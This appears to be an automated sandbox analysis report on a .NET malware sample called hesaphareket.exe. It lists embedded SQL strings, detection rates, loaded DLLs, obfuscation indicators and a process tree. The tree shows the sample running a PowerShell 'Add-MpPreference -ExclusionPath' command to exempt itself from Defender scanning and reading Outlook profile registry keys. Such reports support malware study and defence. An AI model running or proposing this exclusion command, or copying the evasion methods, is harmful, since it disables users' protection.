                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);
                    Source: hesaphareket.exeReversingLabs: Detection: 57%
                    Source: hesaphareket.exeVirustotal: Detection: 58%
                    Source: unknownProcess created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\hesaphareket.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: hesaphareket.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: hesaphareket.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: hesaphareket.exe, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, Xdi37dj88nmLQeMQpH.cs.Net Code: IL6FgNLqhG System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, Xdi37dj88nmLQeMQpH.cs.Net Code: IL6FgNLqhG System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 0_2_00B5DB84 pushfd ; ret 0_2_00B5DB89
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 0_2_06D58770 pushfd ; retf 0_2_06D58771
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_0638A930 push es; ret 7_2_0638A940
                    Source: hesaphareket.exeStatic PE information: section name: .text entropy: 7.528109321327333
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, DB0rNXPAoLV4WyNjdF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Btx9rWtq5b', 'uk39cmRRUK', 'nVq9zCv56U', 'LhcEoH7eWo', 'VDbEl4vON2', 'Q1OE9ahaST', 'P8AEED9J2P', 'Th6iW7dHfFQ6X7FOrT1'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, W6NSRHll0U5bw9XC3tb.csHigh entropy of concatenated method names: 'LHTZcPLMbY', 'YT6ZzHsRVl', 'WILdoL70ZS', 'vp2dlVI7lK', 'cWLd9J2e7Z', 'zFpdEYVYkx', 'BwJdF02pI2', 'f6qd0Yo2CR', 'WgkdbJ50Ie', 'EqkdpdRWoK'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, mOIpKGlo1GpcENTKgBe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GM5ZXgwT8a', 'fCsZffsj7E', 'g8mZ4R0GMB', 'YcIZeapJEL', 'GaCZWrRB3W', 'w5WZKryDVk', 'Q5PZHKI12j'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, U5httJGmuF5DPKTAnl.csHigh entropy of concatenated method names: 'WODpeODi3m', 'GU8pWccfKI', 'apepK3ZAWY', 'GclpHrqgKp', 'FGCpUYRnmL', 'tpIp8ovbEr', 'lcKpiIp4fD', 'buCpkHPPDM', 'hYiprDfCyQ', 'MLGpcFOgmI'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, RLmREhrq916NQ96X43.csHigh entropy of concatenated method names: 'EHQ1Sxwyti', 'Xga12LXQfU', 'U121N6YEQG', 'B8G1Qh1yH1', 'QUu1q9YoU5', 'Cde15S03Wo', 'Sfv1V00Agu', 'GIx1O5w1nW', 'VVs1DPEU4G', 'mmN17HELdn'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, lexLvIJdiNy80Kiycs.csHigh entropy of concatenated method names: 'EWWPBpBiCK', 'Hk8PydWYOm', 'mWoPG0mI62', 'NHKPJtTT9m', 'VI7PnSMCtY', 'rlMPuoBInv', 'Ya6PwSLbbs', 'zd2PIC8V70', 'b5OP1eN3UF', 'qHxPZxbwkP'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, aeCmgZzr3lXS43K00w.csHigh entropy of concatenated method names: 'xckZyDXYyE', 'DyWZG6Mvsu', 'puYZJpgQxs', 'IdEZSDsMwh', 'k3NZ29vhln', 'EKVZQy3SqN', 'FyAZqixl5F', 'dXsZa94APC', 'X2ZZCpaORR', 'fdhZYv6asd'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, Xdi37dj88nmLQeMQpH.csHigh entropy of concatenated method names: 'MtvE0N5Uva', 'dPsEbaNTHk', 'j8mEpuSoav', 'x5mEPiWnjc', 'SttEtgqnFw', 'pkCE6QwIfe', 'NhNELQ5kc4', 'MRGEjRuQWx', 'MQYE3V4rXg', 'j3mETGE6WI'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, ieSK5kStrek0doClXM.csHigh entropy of concatenated method names: 'uWQ60t4aX5', 'Kst6pS8WTS', 'RvU6tFa134', 'EQX6LjqvX2', 'WaV6jpo3wX', 'oohtUKCr8N', 'oCIt8YHeot', 'CyNtiZFkEO', 'z26tk66smp', 'jdJtrAI7BE'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, jcgak2caNw4QSExh2A.csHigh entropy of concatenated method names: 'MyLZPiu4sj', 'M0rZtTVits', 'NwlZ6wuld5', 'HyBZLTsctw', 'aOZZ1SEAQE', 'quGZjPlNBC', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, p05yAfxmLTNU99P8HE.csHigh entropy of concatenated method names: 'He0tm93yN4', 'KxntAQlgIe', 'mT1PN91UAd', 'ELmPQSAsDj', 'rJcPq9XBrE', 'U4GP5VnYBe', 'Mp8PVWqfeg', 'fstPOWhkM1', 'J3CPDaUpnl', 'T9bP7rba57'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, mOLxEjDHWYc8XOHddC.csHigh entropy of concatenated method names: 'yd9LCR8u1n', 'U1cLYEpKjY', 'zAyLgVFVd2', 'RkwLBrvS1W', 'TGJLmUihiN', 'eqfLyMprRc', 'gKcLAnXMZa', 'SXdLG5KSjJ', 'B89LJ0PGoI', 'BHmLxfYVLU'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, hjyEGc4iSUQJitRU4D.csHigh entropy of concatenated method names: 'hEohGFWLcN', 'TEuhJPQGQ5', 'WWohSIhZit', 'uPkh2qFAi8', 'isjhQiZQTY', 'rpHhqXXaaK', 'JiGhVyilRt', 'tGGhOJTOYq', 'rCbh7Ulimm', 'jAphXfmpak'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, SlnkX0H8ePrsk99m6e.csHigh entropy of concatenated method names: 'NG5wTXIC85', 'FBXwvQBpDc', 'ToString', 'w4uwbey0gE', 'EZlwpqQXuY', 'Sj2wP3bmof', 'qlbwtKWbM7', 'Y1Zw6bta4Q', 'clSwLgsdHr', 'RRUwjchwIp'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, ibdPOaiOutWPyPGkXx.csHigh entropy of concatenated method names: 'OKV1nk4AnC', 'nHY1wiAMmF', 'f7o113tFhg', 'cZL1dkG9cI', 'wI01sowF27', 'S571axP4Bu', 'Dispose', 'DcdIbSkpup', 'xHeIptMuaX', 'Wa0IPHpr2o'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, hDpkvMpdbBM5WBbgWJ.csHigh entropy of concatenated method names: 'Dispose', 'hWPlryPGkX', 'EwI92jJoDR', 'zWWNV9QVqo', 'F4plcP3BnE', 'RaTlz0phgO', 'ProcessDialogKey', 'pbe9oLmREh', 'J919l6NQ96', 'O4399Lcgak'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, fXVa8kFOIcYK3XNYlr.csHigh entropy of concatenated method names: 'HqUlL5httJ', 'BuFlj5DPKT', 'qdilTNy80K', 'Vyclvsu05y', 'bP8lnHE6eS', 'S5klutrek0', 'DgqkD1NxNqBfkUtTIa', 'rmDoFBmw3a6ero2pC3', 'E9HllxmuOj', 'VP7lENrISR'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, TJDjG497EqNjuMFx6Z.csHigh entropy of concatenated method names: 'u3UgKC4yB', 'YlqBxendn', 'Tu0ybaZt0', 'US0AR1lmQ', 'WK3JQNcv9', 'nYwxcukjr', 'qSBeSl7BZjVK8weRGs', 'suxM4FpgqBCmf8p6hc', 'ISfsPv4GoKOnR7gMrQ', 'vSIIZ4ETe'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, Oxe9Fwe6IFE8xU8ZF3.csHigh entropy of concatenated method names: 'aaQn7AefGP', 'YqHnfZPywl', 'JXKneBAPRi', 'MAlnWLAchr', 'mRLn2VKa0T', 'OMCnNCCo3V', 'KbxnQygTqc', 'Cfxnq8hU3l', 'FlJn5db8A1', 'LREnV8Vt6x'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, uvYZ8UlFZYq1wXdFnMx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Lu0M1Flf3i', 'vMdMZPKKkW', 'hLjMdAaFYk', 'gtJMMRYbjp', 'fZcMsUjIKA', 'WPmMRPuJZy', 'WItMaiMF0P'
